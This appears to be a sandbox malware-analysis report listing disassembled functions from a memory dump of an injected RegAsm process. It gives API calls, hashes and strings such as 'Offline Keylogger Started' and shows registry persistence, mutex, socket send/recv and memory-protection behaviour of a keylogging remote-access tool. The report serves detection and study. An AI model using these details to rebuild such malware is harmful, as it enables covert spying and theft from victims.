Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1

Function 00415AEA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 00415B0F
GetTickCount.KERNEL32 ref: 00415B86

Strings

NG, xrefs: 00415B3E
!D@, xrefs: 00417089

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CountEventTick
String ID: !D@$NG
API String ID: 180926312-2721294649
Opcode ID: d1ea855bc2f3e0d739dbca72691520e9b135c04ee4d09a703c0d47ad2575d673
Instruction ID: 1740d3d485f2be3f914829e5aa2a54ae858af1ae40273f66f7ff2800e9d96298
Opcode Fuzzy Hash: d1ea855bc2f3e0d739dbca72691520e9b135c04ee4d09a703c0d47ad2575d673
Instruction Fuzzy Hash: 7E51A1316083019AC724FB32D852AEF73A5AF94314F50493FF54A671E2EF3C5949C68A

Function 0040A179 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,0040A27D,?,00000000,00000000), ref: 0040A1FE
CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040A20E
CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040A21A

Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3

Strings

Offline Keylogger Started, xrefs: 0040A19B, 0040A1A2, 0040A1CF

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateThread$LocalTimewsprintf
String ID: Offline Keylogger Started
API String ID: 465354869-4114347211
Opcode ID: bde4462d29761b0d23c786235d2939a769aa686a4d808022a739f1360b93890e
Instruction ID: bcf1cfbdc14a627f6781ea3a40f7cea6448602225ce5b2be95dc640702f6c2bd
Opcode Fuzzy Hash: bde4462d29761b0d23c786235d2939a769aa686a4d808022a739f1360b93890e
Instruction Fuzzy Hash: DE1194B12003187AD220B7369C86CBB765DDA8139CB00057FF946222D2EA795D54CAFB

Function 00404F51 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404F81
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404FCD
CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0

Strings

KeepAlive | Enabled | Timeout: , xrefs: 00404F94

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Create$EventLocalThreadTime
String ID: KeepAlive | Enabled | Timeout:
API String ID: 2532271599-1507639952
Opcode ID: 5b2464df5b8dac7f4146cdbfda56de71be1ea15fa094643bc8b0c6bbca94d29d
Instruction ID: 982fc92e7e47f2769c776e0d9ab1702947c5453eb715a4cfed9cf45540ca89dc
Opcode Fuzzy Hash: 5b2464df5b8dac7f4146cdbfda56de71be1ea15fa094643bc8b0c6bbca94d29d
Instruction Fuzzy Hash: A8110671904385AAC720A7778C0DEAB7FA8DBD2710F04046FF54163291DAB89445CBBA

Function 0041376F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000), ref: 004137A6
RegCloseKey.KERNEL32(?), ref: 004137B1

Strings

pth_unenc, xrefs: 00413773

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: pth_unenc
API String ID: 1818849710-4028850238
Opcode ID: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
Instruction ID: c04290829ccef693e4e8b5b7d06cdf9a2950efbbd707a4c1379ff92f90edcb59
Opcode Fuzzy Hash: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
Instruction Fuzzy Hash: B8F06272400118FBCB009FA1DD45DEA376CEF04B51F108566FD09A61A1D7359E14DB54

Function 00404CC3 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00404DD2
CloseHandle.KERNEL32(00000000), ref: 00404DDB

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Create$CloseEventHandleObjectSingleThreadWait
String ID:
API String ID: 3360349984-0
Opcode ID: f9d5220b46ff8e20b781fb9760721100cc9265fad88895d0f7bb8892bc5cd132
Instruction ID: 465453d6db43d9529954589ba2efa69a6de0eb64d520c2048147815e962fb190
Opcode Fuzzy Hash: f9d5220b46ff8e20b781fb9760721100cc9265fad88895d0f7bb8892bc5cd132
Instruction Fuzzy Hash: 3E4192B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666

Function 1000C7E6 Relevance: 6.1, APIs: 4, Instructions: 65COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838

Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A

Memory Dump Source

Source File: 00000010.00000002.958379212.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.958369053.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.958379212.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd

Similarity

API ID: HandleModuleProtectVirtual
String ID:
API String ID: 2905821283-0
Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE

Function 10005CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D

Memory Dump Source

Source File: 00000010.00000002.958379212.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.958369053.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.958379212.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0

Function 00448566 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
GetLastError.KERNEL32(?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
Instruction ID: d5df962f837ff7629ef00c7a8b4dcab40ba3e58d8e4ddb8b40c265455ff02ab4
Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
Instruction Fuzzy Hash: AA012832602322FBD7214B289C4495B7798AB50B61B20053AFD05D3241DF34CD01CAE8

Function 0041C485 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
GetFileSize.KERNEL32(00000000,00000000), ref: 0041C4B2
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4D7
CloseHandle.KERNEL32(00000000), ref: 0041C4E5

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleReadSize
String ID:
API String ID: 3919263394-0
Opcode ID: 3271d486463dfc93c477f1e2c7ad2cd28a4a76e92964f49fc02a4406d9477efd
Instruction ID: d938e931a51b81dfe9e25773ede9364464a286a3a3b97e7b856b7b87d8bf29b3
Opcode Fuzzy Hash: 3271d486463dfc93c477f1e2c7ad2cd28a4a76e92964f49fc02a4406d9477efd
Instruction Fuzzy Hash: 0FF0C2B1245308BFE6101B25ACD4EBB375CEB867A9F00053EF902A22C1CA298C05913A

Function 00414EE9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21networkCOMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(00000000,00000000,00000000,00472ADC,8.v,00000000,00415188,00000000,00000001), ref: 00414F0B
WSASetLastError.WS2_32(00000000), ref: 00414F10

Part of subcall function 00414D86: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
Part of subcall function 00414D86: LoadLibraryA.KERNEL32(?), ref: 00414E17
Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
Part of subcall function 00414D86: FreeLibrary.KERNEL32(00000000), ref: 00414E3E
Part of subcall function 00414D86: LoadLibraryA.KERNEL32(?), ref: 00414E76
Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
Part of subcall function 00414D86: FreeLibrary.KERNEL32(00000000), ref: 00414E8F
Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E

Strings

8.v, xrefs: 00414EF1

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
String ID: 8.v
API String ID: 1170566393-1733865503
Opcode ID: 6695e73d4224f512b623112065335d5dbc2e445aee0e7ca71efd6bc9c5f08a3e
Instruction ID: cadd3d9b0d0923a9352550a0b766658ea18523973fceddbfefdc7c35282954d4
Opcode Fuzzy Hash: 6695e73d4224f512b623112065335d5dbc2e445aee0e7ca71efd6bc9c5f08a3e
Instruction Fuzzy Hash: 9ED017322015316BD320A769AC01AFBAA9EDBD7771B16003BFA08D3210D6949C8282E8

Function 0040D069 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
GetLastError.KERNEL32 ref: 0040D083

Strings

SG, xrefs: 0040D069

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateErrorLastMutex
String ID: SG
API String ID: 1925916568-3189917014
Opcode ID: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
Opcode Fuzzy Hash: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519

Function 1000C7A7 Relevance: 4.6, APIs: 3, Instructions: 100COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838

Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A

Memory Dump Source

Source File: 00000010.00000002.958379212.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.958369053.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.958379212.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd

Similarity

API ID: HandleModuleProtectVirtual
String ID:
API String ID: 2905821283-0
Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE

Function 00404AA1 Relevance: 4.6, APIs: 3, Instructions: 93synchronizationnetworkCOMMON

Download Yara Rule

APIs

send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: EventObjectSingleWaitsend
String ID:
API String ID: 3963590051-0
Opcode ID: 9fc3f5fbc76b769c61b094c1e0d5237dee77039eb0f94f08c61e3471faa40265
Instruction ID: 83b425c638d75041f18e819343fb0b0c123ba7f8272f9a3a5816098776915250
Opcode Fuzzy Hash: 9fc3f5fbc76b769c61b094c1e0d5237dee77039eb0f94f08c61e3471faa40265
Instruction Fuzzy Hash: A52126B2900119BBCB04ABA1DC95DEE773CFF14314B00452BF515B21E2EE79AA15C6A4

Function 1000C803 Relevance: 4.6, APIs: 3, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838

Memory Dump Source

Source File: 00000010.00000002.958379212.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.958369053.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.958379212.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd

Similarity

API ID: ProtectVirtual$HandleModule
String ID:
API String ID: 3519776433-0
Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE

Function 004135A6 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
RegQueryValueExA.KERNEL32 ref: 004135E7
RegCloseKey.KERNEL32(?), ref: 004135F2

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
Instruction ID: 357f89d7cd1c8cc036c5e31f86fe90e90b696c4569df010e686479b524d11f87
Opcode Fuzzy Hash: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
Instruction Fuzzy Hash: 5A01D676900228BBCF209B91DC09DEF7FBDDB84751F000066BB09E2240DA748E45DBA4

Function 004136F8 Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 00413714
RegQueryValueExA.KERNEL32 ref: 0041372D
RegCloseKey.KERNEL32(00000000), ref: 00413738

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
Instruction ID: 3f277cad741e4f631881634228dfc272d65c1146f3ef4f3c344e6cfa7cb73972
Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
Instruction Fuzzy Hash: 1C018BB1400229FBDF216FA1DC04DEB3F38EF05751F004065BE08621A1D6358AA5DBA4

Function 00413549 Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413569
RegQueryValueExA.KERNEL32 ref: 00413587
RegCloseKey.KERNEL32(?), ref: 00413592

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
Instruction ID: df0ca7b2621da3f23a966dc0a7f3323316399916f3769291e5945d4ebcba47cd
Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
Instruction Fuzzy Hash: E8F01776900218FFDF109FA0DC05FEEBBBCEB04B11F1040A6BA09E6191E2359F54AB94

Function 004134FF Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413516
RegQueryValueExA.KERNEL32 ref: 0041352A
RegCloseKey.KERNEL32(?), ref: 00413535

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
Instruction ID: ffaae2385a847085e6fb085aa4760e2a706d619ab1068a3de776aab9102a8dd7
Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
Instruction Fuzzy Hash: 46E06D32801238FB9F204FA2DC0DDEB7F6CEF06FA2B000155BD0DA2112E2258E50E6E4

Function 00413877 Relevance: 4.5, APIs: 3, Instructions: 30registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004), ref: 004138A0
RegCloseKey.KERNEL32(004660A4), ref: 004138AB

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID:
API String ID: 1818849710-0
Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
Instruction ID: 04a42b38e2882b978ed87177a7d0f50f8458418d63be9de7f69fe35b215911ab
Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
Instruction Fuzzy Hash: 16E06572500318FBEF115F90DC05FEA7B6CDF04B52F1045A5BF09A6191D3358E549798

Function 00404B96 Relevance: 4.5, APIs: 3, Instructions: 28synchronizationnetworkCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
recv.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404BDA

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: EventObjectSingleWaitrecv
String ID:
API String ID: 311754179-0
Opcode ID: 027f0035fd30dc323b2ad7daf66a247a767f4e031cde928d6a9ffdf935cc617f
Instruction ID: 1d69a7fd2e689c68354a0251ffa64299bfe08f5f9c70e8df09ea9ad7bb005133
Opcode Fuzzy Hash: 027f0035fd30dc323b2ad7daf66a247a767f4e031cde928d6a9ffdf935cc617f
Instruction Fuzzy Hash: 00F08236108213FFD7059F10EC09E4AFB62FB84721F10862AF510522B08771FC21DBA5

Function 10006ACB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 10006AF0

Strings

, xrefs: 10006B35

Memory Dump Source

Source File: 00000010.00000002.958379212.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.958369053.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.958379212.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
